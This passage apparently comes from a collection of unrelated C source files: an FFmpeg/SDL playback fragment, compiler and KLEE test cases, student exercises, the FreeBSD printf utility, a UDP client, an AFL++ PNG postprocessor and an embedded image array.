set data to NULL, let the demuxer fill it */ av_init_packet(&pkt); pkt.data = NULL; pkt.size = 0; if (video_stream) printf("Demuxing video from file '%s'\n", src_filename_av); if (audio_stream) printf("Demuxing audio from file '%s'\n", src_filename_av); if (subtitle_stream) printf("Demuxing subtitle from file '%s'\n", src_filename_sub); int isRunning = 1; SDL_Event ev; while (isRunning == 1) { if (SDL_PollEvent(&ev) != 0) { // Getting the events if (ev.type == SDL_QUIT) { quit = 1; isRunning = -1; } } else if (ev.type == SDL_KEYDOWN) { switch (ev.key.keysym.sym) { case SDLK_p: isRunning = -1; break; } } if (av_read_frame(fmt_ctx_av, &pkt) >= 0) { ret = decode_packet(); } } end: avcodec_free_context(&video_dec_ctx); avcodec_free_context(&audio_dec_ctx); avformat_close_input(&fmt_ctx_av); avformat_close_input(&fmt_ctx_sub); if (video_dst_file) fclose(video_dst_file); if (audio_dst_file) fclose(audio_dst_file); av_frame_free(&video_frame); av_frame_free(&audio_frame); av_free(video_dst_data[0]); #if 1 /* Always be sure to clean up */ SDL_DestroyTexture(texture); //SDL_DestroyRenderer(renderer); SDL_DestroyWindow(window); //window = NULL; //texture = NULL; //renderer = NULL; SDL_Quit(); // Free the YUV frame free(yPlane); free(uPlane); free(vPlane); #endif return 0; } #endif
the_stack_data/132076.c
/* Reported by @kren1 in #262 The test makes sure that the string "Should be printed once" is printed a single time. */ // RUN: %llvmgcc %s -emit-llvm -g -O0 -c -o %t.bc // RUN: rm -rf %t.klee-out // RUN: %klee --output-dir=%t.klee-out %t.bc | FileCheck %s static int g_10 = 0x923607A9L; int main(int argc, char* argv[]) { klee_make_symbolic(&g_10,sizeof(g_10), "g_10"); if (g_10 < (int)0x923607A9L) klee_silent_exit(0); if (g_10 > (int)0x923607A9L) klee_silent_exit(0); int b = 2; int i = g_10 % (1 % g_10); i || b; printf("Should be printed once\n"); // CHECK: Should be printed once // CHECK-NOT: Should be printed once return 0; }
the_stack_data/115730.c
#include <stdio.h> #define ARRAY_SIZE 10 #define CORRECT_INPUT 1 #define LOWER_LIMIT 0 #define UPPER_LIMIT 10 #define OK 0 #define INPUT_ARRAY_ERROR 1 #define INPUT_LEN_ERROR 2 void print_array(int *const a, int const len_array) { printf("Cформированный массив: "); for (int i = 0; i != len_array; i++) { printf("%d ", a[i]); } } int insertion_sort(int *const a, int const len_array) { for (int i = 0; i != len_array; i++) { int j = i - 1; int buff = a[i]; while (a[j] > buff && j >= 0) { a[j + 1] = a[j]; j--; } a[j + 1] = buff; } print_array(a, len_array); printf("\n"); return OK; } int input_array(int *const a, int const len_array) { int el_of_array; for (int i = 0; i != len_array; i++) { printf("Введите элемент массива: "); if (scanf("%d", &el_of_array) != 1) { printf("Введен неверный элемент массива!\n"); return INPUT_ARRAY_ERROR; } a[i] = el_of_array; } return OK; } int main(void) { int len_array; int a[ARRAY_SIZE] = { 0 }; printf("Введите количество элементов массива: "); if (scanf("%d", &len_array) == CORRECT_INPUT && len_array > \ LOWER_LIMIT && len_array <= UPPER_LIMIT) { if (input_array(a, len_array) == INPUT_ARRAY_ERROR) return INPUT_ARRAY_ERROR; insertion_sort(a, len_array); return OK; } printf("Неверно указано количество элементов массива!\n"); return INPUT_LEN_ERROR; }
the_stack_data/68888881.c
/* * Copyright (c) Huawei Technologies Co., Ltd. 2012-2021. All rights reserved. */ int main() { return 0; }
the_stack_data/150140365.c
/*- * Copyright 2014 Garrett D'Amore <[email protected]> * Copyright 2010 Nexenta Systems, Inc. All rights reserved. * Copyright (c) 1989, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#) Copyright (c) 1989, 1993 The Regents of the University of California. All rights reserved. * @(#)printf.c 8.1 (Berkeley) 7/20/93 * $FreeBSD: head/usr.bin/printf/printf.c 279503 2015-03-01 21:46:55Z jilles $ */ /* * Important: This file is used both as a standalone program /usr/bin/printf * and as a builtin for /bin/sh (#define SHELL). */ #include <sys/types.h> #include <ctype.h> #include <err.h> #include <errno.h> #include <inttypes.h> #include <limits.h> #include <locale.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <wchar.h> #ifdef SHELL #define main printfcmd #include "bltin/bltin.h" #include "error.h" #endif #define PF(f, func) do { \ char *b = NULL; \ if (havewidth) \ if (haveprec) \ asprintf(&b, f, fieldwidth, precision, func); \ else \ asprintf(&b, f, fieldwidth, func); \ else if (haveprec) \ asprintf(&b, f, precision, func); \ else \ asprintf(&b, f, func); \ if (b) { \ fputs(b, stdout); \ free(b); \ } \ } while (0) static int asciicode(void); static char *printf_doformat(char *, int *); static int escape(char *, int, size_t *); static int getchr(void); static int getfloating(long double *, int); static int getint(int *); static int getnum(intmax_t *, uintmax_t *, int); static const char *getstr(void); static char *mknum(char *, char); static void usage(void); static const char digits[] = "0123456789"; static char end_fmt[1]; static int myargc; static char **myargv; static char **gargv; static char **maxargv; int main(int argc, char *argv[]) { size_t len; int end, rval; char *format, *fmt, *start; #ifndef SHELL setlocale(LC_ALL, ""); #endif /* * We may not use getopt(3) because calling * "printf -f%s oo" may not result in an invalid * option error. * However common usage and other implementations seem * to indicate that we need to allow -- as a discardable * option separator. */ if (argc > 1 && strcmp(argv[1], "--") == 0) { argc--; argv++; } if (argc < 2) { usage(); return (1); } argv++; #ifdef SHELL INTOFF; #endif /* * Basic algorithm is to scan the format string for conversion * specifications -- once one is found, find out if the field * width or precision is a '*'; if it is, gather up value. Note, * format strings are reused as necessary to use up the provided * arguments, arguments of zero/null string are provided to use * up the format string. */ fmt = format = *argv; escape(fmt, 1, &len); /* backslash interpretation */ rval = end = 0; gargv = ++argv; for (;;) { maxargv = gargv; myargv = gargv; for (myargc = 0; gargv[myargc]; myargc++) /* nop */; start = fmt; while (fmt < format + len) { if (fmt[0] == '%') { fwrite(start, 1, fmt - start, stdout); if (fmt[1] == '%') { /* %% prints a % */ putchar('%'); fmt += 2; } else { fmt = printf_doformat(fmt, &rval); if (fmt == NULL || fmt == end_fmt) { #ifdef SHELL INTON; #endif return (fmt == NULL ? 1 : rval); } end = 0; } start = fmt; } else fmt++; if (gargv > maxargv) maxargv = gargv; } gargv = maxargv; if (end == 1) { warnx("missing format character"); #ifdef SHELL INTON; #endif return (1); } fwrite(start, 1, fmt - start, stdout); if (!*gargv) { #ifdef SHELL INTON; #endif return (rval); } /* Restart at the beginning of the format string. */ fmt = format; end = 1; } /* NOTREACHED */ } static char * printf_doformat(char *fmt, int *rval) { static const char skip1[] = "#'-+ 0"; int fieldwidth, haveprec, havewidth, mod_ldbl, precision; char convch, nextch; char start[strlen(fmt) + 1]; char **fargv; char *dptr; int l; dptr = start; *dptr++ = '%'; *dptr = 0; fmt++; /* look for "n$" field index specifier */ l = strspn(fmt, digits); if ((l > 0) && (fmt[l] == '$')) { int idx = atoi(fmt); if (idx <= myargc) { gargv = &myargv[idx - 1]; } else { gargv = &myargv[myargc]; } if (gargv > maxargv) maxargv = gargv; fmt += l + 1; /* save format argument */ fargv = gargv; } else { fargv = NULL; } /* skip to field width */ while (*fmt && strchr(skip1, *fmt) != NULL) { *dptr++ = *fmt++; *dptr = 0; } if (*fmt == '*') { fmt++; l = strspn(fmt, digits); if ((l > 0) && (fmt[l] == '$')) { int idx = atoi(fmt); if (fargv == NULL) { warnx("incomplete use of n$"); return (NULL); } if (idx <= myargc) { gargv = &myargv[idx - 1]; } else { gargv = &myargv[myargc]; } fmt += l + 1; } else if (fargv != NULL) { warnx("incomplete use of n$"); return (NULL); } if (getint(&fieldwidth)) return (NULL); if (gargv > maxargv) maxargv = gargv; havewidth = 1; *dptr++ = '*'; *dptr = 0; } else { havewidth = 0; /* skip to possible '.', get following precision */ while (isdigit(*fmt)) { *dptr++ = *fmt++; *dptr = 0; } } if (*fmt == '.') { /* precision present? */ fmt++; *dptr++ = '.'; if (*fmt == '*') { fmt++; l = strspn(fmt, digits); if ((l > 0) && (fmt[l] == '$')) { int idx = atoi(fmt); if (fargv == NULL) { warnx("incomplete use of n$"); return (NULL); } if (idx <= myargc) { gargv = &myargv[idx - 1]; } else { gargv = &myargv[myargc]; } fmt += l + 1; } else if (fargv != NULL) { warnx("incomplete use of n$"); return (NULL); } if (getint(&precision)) return (NULL); if (gargv > maxargv) maxargv = gargv; haveprec = 1; *dptr++ = '*'; *dptr = 0; } else { haveprec = 0; /* skip to conversion char */ while (isdigit(*fmt)) { *dptr++ = *fmt++; *dptr = 0; } } } else haveprec = 0; if (!*fmt) { warnx("missing format character"); return (NULL); } *dptr++ = *fmt; *dptr = 0; /* * Look for a length modifier. POSIX doesn't have these, so * we only support them for floating-point conversions, which * are extensions. This is useful because the L modifier can * be used to gain extra range and precision, while omitting * it is more likely to produce consistent results on different * architectures. This is not so important for integers * because overflow is the only bad thing that can happen to * them, but consider the command printf %a 1.1 */ if (*fmt == 'L') { mod_ldbl = 1; fmt++; if (!strchr("aAeEfFgG", *fmt)) { warnx("bad modifier L for %%%c", *fmt); return (NULL); } } else { mod_ldbl = 0; } /* save the current arg offset, and set to the format arg */ if (fargv != NULL) { gargv = fargv; } convch = *fmt; nextch = *++fmt; *fmt = '\0'; switch (convch) { case 'b': { size_t len; char *p; int getout; p = strdup(getstr()); if (p == NULL) { warnx("%s", strerror(ENOMEM)); return (NULL); } getout = escape(p, 0, &len); fputs(p, stdout); free(p); if (getout) return (end_fmt); break; } case 'c': { char p; p = getchr(); PF(start, p); break; } case 's': { const char *p; p = getstr(); PF(start, p); break; } case 'd': case 'i': case 'o': case 'u': case 'x': case 'X': { char *f; intmax_t val; uintmax_t uval; int signedconv; signedconv = (convch == 'd' || convch == 'i'); if ((f = mknum(start, convch)) == NULL) return (NULL); if (getnum(&val, &uval, signedconv)) *rval = 1; if (signedconv) PF(f, val); else PF(f, uval); break; } case 'e': case 'E': case 'f': case 'F': case 'g': case 'G': case 'a': case 'A': { long double p; if (getfloating(&p, mod_ldbl)) *rval = 1; if (mod_ldbl) PF(start, p); else PF(start, (double)p); break; } default: warnx("illegal format character %c", convch); return (NULL); } *fmt = nextch; /* return the gargv to the next element */ return (fmt); } static char * mknum(char *str, char ch) { static char *copy; static size_t copy_size; char *newcopy; size_t len, newlen; len = strlen(str) + 2; if (len > copy_size) { newlen = ((len + 1023) >> 10) << 10; if ((newcopy = realloc(copy, newlen)) == NULL) { warnx("%s", strerror(ENOMEM)); return (NULL); } copy = newcopy; copy_size = newlen; } memmove(copy, str, len - 3); copy[len - 3] = 'j'; copy[len - 2] = ch; copy[len - 1] = '\0'; return (copy); } static int escape(char *fmt, int percent, size_t *len) { char *save, *store, c; int value; for (save = store = fmt; ((c = *fmt) != 0); ++fmt, ++store) { if (c != '\\') { *store = c; continue; } switch (*++fmt) { case '\0': /* EOS, user error */ *store = '\\'; *++store = '\0'; *len = store - save; return (0); case '\\': /* backslash */ case '\'': /* single quote */ *store = *fmt; break; case 'a': /* bell/alert */ *store = '\a'; break; case 'b': /* backspace */ *store = '\b'; break; case 'c': if (!percent) { *store = '\0'; *len = store - save; return (1); } *store = 'c'; break; case 'f': /* form-feed */ *store = '\f'; break; case 'n': /* newline */ *store = '\n'; break; case 'r': /* carriage-return */ *store = '\r'; break; case 't': /* horizontal tab */ *store = '\t'; break; case 'v': /* vertical tab */ *store = '\v'; break; /* octal constant */ case '0': case '1': case '2': case '3': case '4': case '5': case '6': case '7': c = (!percent && *fmt == '0') ? 4 : 3; for (value = 0; c-- && *fmt >= '0' && *fmt <= '7'; ++fmt) { value <<= 3; value += *fmt - '0'; } --fmt; if (percent && value == '%') { *store++ = '%'; *store = '%'; } else *store = (char)value; break; default: *store = *fmt; break; } } *store = '\0'; *len = store - save; return (0); } static int getchr(void) { if (!*gargv) return ('\0'); return ((int)**gargv++); } static const char * getstr(void) { if (!*gargv) return (""); return (*gargv++); } static int getint(int *ip) { intmax_t val; uintmax_t uval; int rval; if (getnum(&val, &uval, 1)) return (1); rval = 0; if (val < INT_MIN || val > INT_MAX) { warnx("%s: %s", *gargv, strerror(ERANGE)); rval = 1; } *ip = (int)val; return (rval); } static int getnum(intmax_t *ip, uintmax_t *uip, int signedconv) { char *ep; int rval; if (!*gargv) { *ip = *uip = 0; return (0); } if (**gargv == '"' || **gargv == '\'') { if (signedconv) *ip = asciicode(); else *uip = asciicode(); return (0); } rval = 0; errno = 0; if (signedconv) *ip = strtoimax(*gargv, &ep, 0); else *uip = strtoumax(*gargv, &ep, 0); if (ep == *gargv) { warnx("%s: expected numeric value", *gargv); rval = 1; } else if (*ep != '\0') { warnx("%s: not completely converted", *gargv); rval = 1; } if (errno == ERANGE) { warnx("%s: %s", *gargv, strerror(ERANGE)); rval = 1; } ++gargv; return (rval); } static int getfloating(long double *dp, int mod_ldbl) { char *ep; int rval; if (!*gargv) { *dp = 0.0; return (0); } if (**gargv == '"' || **gargv == '\'') { *dp = asciicode(); return (0); } rval = 0; errno = 0; if (mod_ldbl) *dp = strtold(*gargv, &ep); else *dp = strtod(*gargv, &ep); if (ep == *gargv) { warnx("%s: expected numeric value", *gargv); rval = 1; } else if (*ep != '\0') { warnx("%s: not completely converted", *gargv); rval = 1; } if (errno == ERANGE) { warnx("%s: %s", *gargv, strerror(ERANGE)); rval = 1; } ++gargv; return (rval); } static int asciicode(void) { int ch; wchar_t wch; mbstate_t mbs; ch = (unsigned char)**gargv; if (ch == '\'' || ch == '"') { memset(&mbs, 0, sizeof(mbs)); switch (mbrtowc(&wch, *gargv + 1, MB_LEN_MAX, &mbs)) { case (size_t)-2: case (size_t)-1: wch = (unsigned char)gargv[0][1]; break; case 0: wch = 0; break; } ch = wch; } ++gargv; return (ch); } static void usage(void) { fprintf(stderr, "usage: printf format [arguments ...]\n"); }
the_stack_data/179831986.c
// RUN: 3c -addcr %s -- | FileCheck -match-full-lines --check-prefixes="CHECK" %s // RUN: 3c -addcr %s -- | %clang -c -fcheckedc-extension -x c -o /dev/null - void foo(int *x) { //CHECK: void foo(_Ptr<int> x) _Checked { while(1) { //CHECK: while(1) { *x += 1; if(0) { //CHECK: if(0) _Unchecked { int *y = (int*) 3; //CHECK: int *y = (int*) 3; if(0) { //CHECK: if(0) { *y += 1; while(0) { //CHECK: while(0) _Checked { *x += 1; } } } } }
the_stack_data/170451860.c
/* ************************************************************************** */ /* */ /* ::: :::::::: */ /* rush03.c :+: :+: :+: */ /* +:+ +:+ +:+ */ /* By: kaye <[email protected]> +#+ +:+ +#+ */ /* +#+#+#+#+#+ +#+ */ /* Created: 2020/08/08 10:48:16 by kaye #+# #+# */ /* Updated: 2020/08/09 20:03:06 by kaye ### ########.fr */ /* */ /* ************************************************************************** */ #include <unistd.h> void ft_putchar(char c); void ft_print_top(int x) { int i; i = 2; if (x >= 1) { ft_putchar('A'); while (i < x) { ft_putchar('B'); i++; } if (x >= 2) ft_putchar('C'); } } void ft_print_down(int x) { int i; i = 2; if (x >= 1) { ft_putchar('A'); while (i < x) { ft_putchar('B'); i++; } if (x >= 2) ft_putchar('C'); } } void ft_print_mid(int x) { int i; i = 2; if (x >= 1) { ft_putchar('B'); while (i < x) { ft_putchar(' '); i++; } if (x >= 2) ft_putchar('B'); } } void rush(int x, int y) { int i; i = 2; if (x >= 1 && y >= 1) { ft_print_top(x); ft_putchar('\n'); while (i < y) { ft_print_mid(x); ft_putchar('\n'); i++; } if (y >= 2) { ft_print_down(x); ft_putchar('\n'); } } }
the_stack_data/40761687.c
/************************************************************************ * libc/math/lib_acosf.c * * This file is a part of NuttX: * * Copyright (C) 2012 Gregory Nutt. All rights reserved. * Ported by: Darcy Gong * * It derives from the Rhombs OS math library by Nick Johnson which has * a compatibile, MIT-style license: * * Copyright (C) 2009, 2010 Nick Johnson <nickbjohnson4224 at gmail.com> * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. * ************************************************************************/ /************************************************************************ * Included Files ************************************************************************/ #include <math.h> /************************************************************************ * Public Functions ************************************************************************/ float acosf(float x) { return (M_PI_2 - asinf(x)); }
the_stack_data/97011514.c
/* a program using math function*/ #include<stdio.h> #include<math.h> #define PI 3.1416 #define MAX 180 main() { int angle; float x,y; angle =0; printf("Angle cos(angle)\n\n"); while(angle<=MAX) { x=(PI/MAX)*angle; y=cos(x); printf("%15d %13.4f \n",angle,y); angle=angle+10; } }
the_stack_data/34659.c
// RUN: %clang_cc1 %s -verify -fsyntax-only void f(_Atomic(int) a, _Atomic(int) b) { if (a > b) {} // no warning if (a < b) {} // no warning if (a >= b) {} // no warning if (a <= b) {} // no warning if (a == b) {} // no warning if (a != b) {} // no warning if (a == 0) {} // no warning if (a > 0) {} // no warning if (a > 1) {} // no warning if (a > 2) {} // no warning if (!a > 0) {} // no warning if (!a > 1) {} // expected-warning {{comparison of constant 1 with boolean expression is always false}} if (!a > 2) {} // expected-warning {{comparison of constant 2 with boolean expression is always false}} if (!a > b) {} // no warning if (!a > -1) {} // expected-warning {{comparison of constant -1 with boolean expression is always true}} }
the_stack_data/54823943.c
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> int main() { int network_socket; network_socket=socket(AF_INET,SOCK_DGRAM,0); struct sockaddr_in network_address; bzero(&network_address,sizeof(network_address)); network_address.sin_family=AF_INET; network_address.sin_port=htons(9003); network_address.sin_addr.s_addr=INADDR_ANY; int addr_len=sizeof(network_address); int client_response1; printf("\n[!] Enter any number:\n"); scanf("%d",&client_response1); int client_response=htonl(client_response1); int send_status=sendto(network_socket,&client_response,sizeof(client_response),0,(struct sockaddr*)&network_address,addr_len); if(send_status==-1) printf("\n[-] Error in sending.\n"); else printf("\n[+] Message successfully sent to server.\n"); printf("\n[!] Waiting for server to respond...\n"); char server_response[200]; int recv_status=recvfrom(network_socket,server_response,sizeof(server_response),0,(struct sockaddr*)&network_address,&addr_len); printf("\n[+] The server echoed the following:\n"); //write(1,server_response,recv_status); printf("%s\n",server_response); close(network_socket); return 0; }
the_stack_data/12297.c
/*- * Copyright (c) 1980 The Regents of the University of California. * All rights reserved. * * %sccs.include.proprietary.c% */ #ifndef lint static char sccsid[] = "@(#)h_abs.c 5.2 (Berkeley) 04/12/91"; #endif /* not lint */ short h_abs(x) short *x; { if(*x >= 0) return(*x); return(- *x); }
the_stack_data/775992.c
/* Exercise 1 - Calculations Write a C program to input marks of two subjects. Calculate and print the average of the two marks. */ #include <stdio.h> int main() { int num1,num2; float avg; printf("Enter number 1 : "); scanf("%d",&num1); printf("Enter number 2 : "); scanf("%d",&num2); avg=(num1+num2)/2; printf("Average : %.2f",avg); return 0; }
the_stack_data/68887897.c
#include <stdio.h> #define DIM 50 /* Acquisiamo una stringa e ne calcoliamo la lunghezza in vari modi. */ int main() { char str[DIM + 1]; int len1, len2, len3; char *p2, *p3; scanf("%s", str); for (len1 = 0; str[len1] != '\0'; len1++) ; for (p2 = str, len2 = 0; *(p2 + len2) != '\0'; len2++) ; for (p3 = str; *p3 != '\0'; p3++) ; len3 = p3 - str; printf("%d %d %d\n", len1, len2, len3); return 0; }
the_stack_data/65999.c
#include <stdio.h> int main(void) { double marks[10]= {0},weights[10]= {0},weights_sum,weighted_ave; int n,k=0; FILE *fweight; if ((fweight = fopen("F:/school/Y1S1/Computing/Tut12/weights.txt","r"))==NULL) { printf("Can't open file."); return 1; } for(n=0; fscanf(fweight,"%lf",&weights[n])!=EOF; n++,k++) printf("The current k value is %d.\n",k); for(n=0; n<k; n++) { printf("Weight[%d]\t%.2f\tEnter mark[%d]\t",n+1,weights[n],n+1); scanf("%lf",&marks[n]); printf("\t\t\tmark[%d]\t\t%.2f\n",n+1,marks[n]); weights_sum+=weights[n]; } if (weights_sum!=1) printf("Error; weights don't add to 1.0"); else for(n=0; n<k; n++) { weighted_ave+=weights[n]*marks[n]; printf("Weighted average is %.2f.",weighted_ave); } fclose(fweight); return 0; }
the_stack_data/192329384.c
#include<stdio.h> int main(int argc,char *argv[]) { int ages[] = {23,43,12,89,2}; char *names[] = {"Alan","Frank","Mary","John","Lisa"}; int count = sizeof(ages)/sizeof(int); int i = 0; for(i = 0;i < count;i++){ printf("%s has %d years alive.\n",names[i],ages[i]); } printf("---\n"); int *cur_age= ages; char **cur_name = names; for(i = 0;i < count;i++){ printf("%s has %d years old.\n",*(cur_name + i),*(cur_age + i)); } printf("---\n"); for(i = 0;i < count;i++){ printf("%s has %d years again.\n",cur_name[i],cur_age[i]); } printf("---\n"); for(cur_name,cur_age = ages;(cur_age - ages) < count;cur_name++,cur_age++){ printf("%s lived %d years so far.\n",*cur_name,*cur_age); } return 0; }
the_stack_data/565788.c
/* american fuzzy lop++ - postprocessor for PNG ------------------------------------------ Originally written by Michal Zalewski Copyright 2015 Google Inc. All rights reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at: http://www.apache.org/licenses/LICENSE-2.0 See post_library.so.c for a general discussion of how to implement postprocessors. This specific postprocessor attempts to fix up PNG checksums, providing a slightly more complicated example than found in post_library.so.c. Compile with: gcc -shared -Wall -O3 post_library_png.so.c -o post_library_png.so -lz */ #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <string.h> #include <zlib.h> #include <arpa/inet.h> /* A macro to round an integer up to 4 kB. */ #define UP4K(_i) ((((_i) >> 12) + 1) << 12) const unsigned char* afl_postprocess(const unsigned char* in_buf, unsigned int* len) { static unsigned char* saved_buf; static unsigned int saved_len; unsigned char* new_buf = (unsigned char*)in_buf; unsigned int pos = 8; /* Don't do anything if there's not enough room for the PNG header (8 bytes). */ if (*len < 8) return in_buf; /* Minimum size of a zero-length PNG chunk is 12 bytes; if we don't have that, we can bail out. */ while (pos + 12 <= *len) { unsigned int chunk_len, real_cksum, file_cksum; /* Chunk length is the first big-endian dword in the chunk. */ chunk_len = ntohl(*(uint32_t*)(in_buf + pos)); /* Bail out if chunk size is too big or goes past EOF. */ if (chunk_len > 1024 * 1024 || pos + 12 + chunk_len > *len) break; /* Chunk checksum is calculated for chunk ID (dword) and the actual payload. */ real_cksum = htonl(crc32(0, in_buf + pos + 4, chunk_len + 4)); /* The in-file checksum is the last dword past the chunk data. */ file_cksum = *(uint32_t*)(in_buf + pos + 8 + chunk_len); /* If the checksums do not match, we need to fix the file. */ if (real_cksum != file_cksum) { /* First modification? Make a copy of the input buffer. Round size up to 4 kB to minimize the number of reallocs needed. */ if (new_buf == in_buf) { if (*len <= saved_len) { new_buf = saved_buf; } else { new_buf = realloc(saved_buf, UP4K(*len)); if (!new_buf) return in_buf; saved_buf = new_buf; saved_len = UP4K(*len); memcpy(new_buf, in_buf, *len); } } *(uint32_t*)(new_buf + pos + 8 + chunk_len) = real_cksum; } /* Skip the entire chunk and move to the next one. */ pos += 12 + chunk_len; } return new_buf; }
the_stack_data/90765432.c
const unsigned char gImage_fun_sel[17024] = { /* 0X00,0X10,0X26,0X00,0XE0,0X00,0X01,0X1B, */ 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X03,0X09,0X8D,0X24,0X32,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X32,0X36, 0X8D,0X24,0X03,0X09,0X00,0X00,0X00,0X00,0X00,0X00,0X03,0X09,0X12,0X36,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X12,0X36, 0X03,0X09,0X00,0X00,0X00,0X00,0X4D,0X24,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X4D,0X24,0X00,0X00, 0X00,0X00,0X12,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X12,0X36,0X00,0X00,0X00,0X00,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X00,0X00,0X00,0X00,0X73,0X36,0X73,0X36,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36, 0X73,0X36,0X00,0X00,0X00,0X00,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36, 0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36,0X73,0X36, 